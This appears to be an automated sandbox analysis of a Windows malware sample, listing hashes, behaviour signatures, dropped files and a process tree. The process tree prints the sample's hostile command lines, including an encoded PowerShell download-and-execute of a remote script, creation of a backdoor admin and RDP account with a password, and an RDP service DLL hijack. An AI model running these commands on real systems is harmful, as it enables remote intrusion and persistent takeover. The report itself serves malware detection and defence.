Analysis

max time kernel: 143s
max time network: 143s
platform: windows10_x64
resource: win10v20201028
submitted: 17-11-2020 12:38

Static task: static1
Behavioral task: behavioral1
  Sample: 09fd827d8b404557a5c9e06810247c12.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: 09fd827d8b404557a5c9e06810247c12.exe
  Resource: win10v20201028
General

Target: 09fd827d8b404557a5c9e06810247c12.exe
Size: 3.4MB
MD5: afb57d5d065aaa204e8a5c6803bab72b
SHA1: 5cd785582bba69f740a8943c02123e683a541b3b
SHA256: 3126cbdac814b04d544ff02e968d2143b231bb6d981ff8bf1812f6314cca187e
SHA512: 40bfdc844abc2f49e810ac63e6e6b739aa656830d3833292dd1b43456a8452aa7181d675e28e4f4bf0f920009e35b0d631ec39a25968f12b7335528c41181f98

Malware Config

Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures

Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.

Blacklisted process makes network request (9 IoCs)
  Processes (flow, pid, process):
    17  1352  powershell.exe
    19  1352  powershell.exe
    20  1352  powershell.exe
    21  1352  powershell.exe
    23  1352  powershell.exe
    25  1352  powershell.exe
    27  1352  powershell.exe
    29  1352  powershell.exe
    31  1352  powershell.exe

Modifies RDP port number used by Windows (1 TTPs)

Sets DLL path for service in the registry (2 TTPs)

Processes (resource, yara_rule):
    \Windows\Branding\mediasrv.png  upx
    \Windows\Branding\mediasvc.png  upx

Deletes itself (1 IoCs)
  Processes (pid, process):
    4044  powershell.exe

Loads dropped DLL (2 IoCs)
  Processes (pid, process):
    3524
    3524

Modifies service (2 TTPs, 2 IoCs)
  Processes (description, ioc, process):
    Key created      \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters  reg.exe
    Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"  reg.exe

Drops file in Program Files directory (4 IoCs)
  Processes (description, ioc, process):
    File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT  powershell.exe
    File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI  powershell.exe
    File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT  powershell.exe
    File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI  powershell.exe

Drops file in Windows directory (19 IoCs)
  Processes (description, ioc, process):
    File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A22.tmp  powershell.exe
    File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A42.tmp  powershell.exe
    File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log  powershell.exe
    File created                  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP  powershell.exe
    File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI19B3.tmp  powershell.exe
    File opened for modification  C:\Windows\branding\Basebrd  powershell.exe
    File opened for modification  C:\Windows\branding\wupsvc.jpg  powershell.exe
    File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_skstoarn.odq.psm1  powershell.exe
    File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat  powershell.exe
    File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
    File created                  C:\Windows\branding\mediasrv.png  powershell.exe
    File created                  C:\Windows\branding\wupsvc.jpg  powershell.exe
    File opened for modification  C:\Windows\branding\mediasvc.png  powershell.exe
    File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_nkrwmeci.zpm.ps1  powershell.exe
    File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A53.tmp  powershell.exe
    File opened for modification  C:\Windows\branding\ShellBrd  powershell.exe
    File opened for modification  C:\Windows\branding\mediasrv.png  powershell.exe
    File created                  C:\Windows\branding\mediasvc.png  powershell.exe
    File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1A12.tmp  powershell.exe

Modifies data under HKEY_USERS (217 IoCs)
Modifies registry key (1 TTPs, 1 IoCs)

Runs net.exe

Script User-Agent (2 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes (description, flow, ioc):
    HTTP User-Agent header  19  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    HTTP User-Agent header  21  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses (9 IoCs)
  Processes (pid, process):
    4044  powershell.exe
    4044  powershell.exe
    4044  powershell.exe
    4044  powershell.exe
    4044  powershell.exe
    4044  powershell.exe
    1352  powershell.exe
    1352  powershell.exe
    1352  powershell.exe

Suspicious behavior: LoadsDriver (2 IoCs)
  Processes (pid, process):
    616
    616

Suspicious use of AdjustPrivilegeToken (77 IoCs)
Suspicious use of WriteProcessMemory (68 IoCs)
Processes (process tree, nested by parent; signature hits listed under each process)

- C:\Users\Admin\AppData\Local\Temp\09fd827d8b404557a5c9e06810247c12.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\09fd827d8b404557a5c9e06810247c12.exe"
  hits: Suspicious use of WriteProcessMemory
  - \??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
    hits: Deletes itself; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xlpsxo0v\xlpsxo0v.cmdline"
      hits: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES95FC.tmp" "c:\Users\Admin\AppData\Local\Temp\xlpsxo0v\CSCDA13A91742D475390F7D6E7FB1B50AF.TMP"
    - C:\Windows\system32\reg.exe
      cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\system32\reg.exe
      cmdline: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      hits: Modifies service; Modifies registry key
    - C:\Windows\system32\reg.exe
      cmdline: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - C:\Windows\system32\net.exe
      cmdline: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      hits: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - C:\Windows\system32\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      hits: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe
        cmdline: cmd /c net start rdpdr
        hits: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe
          cmdline: net start rdpdr
          hits: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe
            cmdline: C:\Windows\system32\net1 start rdpdr
    - C:\Windows\system32\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      hits: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe
        cmdline: cmd /c net start TermService
        hits: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe
          cmdline: net start TermService
          hits: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe
            cmdline: C:\Windows\system32\net1 start TermService
    - C:\Windows\system32\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - C:\Windows\system32\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe user updwin Ghasar4f5 /del
  hits: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    cmdline: net.exe user updwin Ghasar4f5 /del
    hits: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 user updwin Ghasar4f5 /del

- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe user updwin k1x2hnfU /add
  hits: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    cmdline: net.exe user updwin k1x2hnfU /add
    hits: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 user updwin k1x2hnfU /add

- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
  hits: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    cmdline: net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
    hits: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD

- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
  hits: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    cmdline: net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
    hits: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD

- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
  hits: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    cmdline: net.exe LOCALGROUP "Administrators" updwin /ADD
    hits: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD

- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe user updwin k1x2hnfU
  hits: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    cmdline: net.exe user updwin k1x2hnfU
    hits: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 user updwin k1x2hnfU

- C:\Windows\System32\cmd.exe
  cmdline: cmd.exe /C wmic path win32_VideoController get name
  hits: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\Wbem\WMIC.exe
    cmdline: wmic path win32_VideoController get name

- C:\Windows\System32\cmd.exe
  cmdline: cmd.exe /C wmic CPU get NAME
  hits: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\Wbem\WMIC.exe
    cmdline: wmic CPU get NAME
    hits: Modifies data under HKEY_USERS

- C:\Windows\System32\cmd.exe
  cmdline: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  hits: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe
    cmdline: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    hits: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      hits: Blacklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\RES95FC.tmp
  MD5: 7b4bae7b1a4fb86d479d7a7d45abab57
  SHA1: f00a9a82bca413cb94875784900293337872d83c
  SHA256: bfa85151bda4784c29cc7c0c892f3ca785c80d7a434c4a1b9cfe617a0a326202
  SHA512: ad7b4d65944bfa4311eb2655743ceb45f7ad4aa33e543835d15aaebeaee57a1ca2e098ba40914528cf81941edae0cbe8494288bcb21fd2c2ae98b04a77b220bb

C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  MD5: dac6b25db50155c0c78d5bf64fb95fa3
  SHA1: 9e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
  SHA256: 6967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
  SHA512: 679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868

C:\Users\Admin\AppData\Local\Temp\get-points.zip
  MD5: 7cac19b2868c41555db4b71219217f9b
  SHA1: d6f77db578db3c5c572c3a944d9072ed00560dcb
  SHA256: d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
  SHA512: 5bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6

C:\Users\Admin\AppData\Local\Temp\xlpsxo0v\xlpsxo0v.dll
  MD5: 8290e396ce6498b0ecc75c7629284dc5
  SHA1: 50d4c1a43e8f75a0f82a532c7e42c2bc326f8a85
  SHA256: 3c5caa83e8f51702acbf1d77ce453d28172229935b9b782d5ca4ee21d87b547a
  SHA512: 8782392ae4a3d28180a7748ca9eea2acb0bc955c923090b30e48b6210a189abc72adb61a39a2a282deeb844030bebb553d6dc1607492d68da87f2875569d5118

\??\c:\Users\Admin\AppData\Local\Temp\xlpsxo0v\CSCDA13A91742D475390F7D6E7FB1B50AF.TMP
  MD5: 5c3155b03edf4a4e2dc7793d3c91083a
  SHA1: 99b2b850c3eabe267fa2c62818a4dd50bc5049d3
  SHA256: 7c87e9fab418ea94ad13df701b6035cddba5cb22517502430d1f86ad2866a192
  SHA512: a04950d75c41ba60dcac8ea8d8623eb347007af93ae2212a82dffec8bf1cd6d1bc15d46d1c25ce965a3fa815dc8c50ae741bf3a7ee0687e020cfdc99eea917f0

\??\c:\Users\Admin\AppData\Local\Temp\xlpsxo0v\xlpsxo0v.0.cs
  MD5: 6f235215132cdebacd0f793fe970d0e3
  SHA1: 2841e44c387ed3b6f293611992f1508fe9b55b89
  SHA256: ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
  SHA512: a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

\??\c:\Users\Admin\AppData\Local\Temp\xlpsxo0v\xlpsxo0v.cmdline
  MD5: 05cff55c341e110ebe530869da489356
  SHA1: 7c8fee5a4a3c679bf9128a7c40a2432527d86dbd
  SHA256: 3049b210871c80f0f7ba283ff092633c4599ee06ab7d5e787cec1a54b68a32a8
  SHA512: 70f0136882a3026d3086842d709ee71c4d34981f79b48f73b751ea4749b02f1ce94cdff803d3156313e3ccd413e2f2ad3645ba2fe1415cfb2b3a8f1bf66136ef

\Windows\Branding\mediasrv.png
  MD5: eeb448ea2709c57b9ea2e223d0c79396
  SHA1: 38331dd027386151ee37a29a7820570a76427b02
  SHA256: c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
  SHA512: c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc

\Windows\Branding\mediasvc.png
  MD5: bb873bd05a47f502ee4ed3c4ea749a4f
  SHA1: e55a6bf49a4833fb9e9b123df39dac9bf507f75a
  SHA256: a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
  SHA512: ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548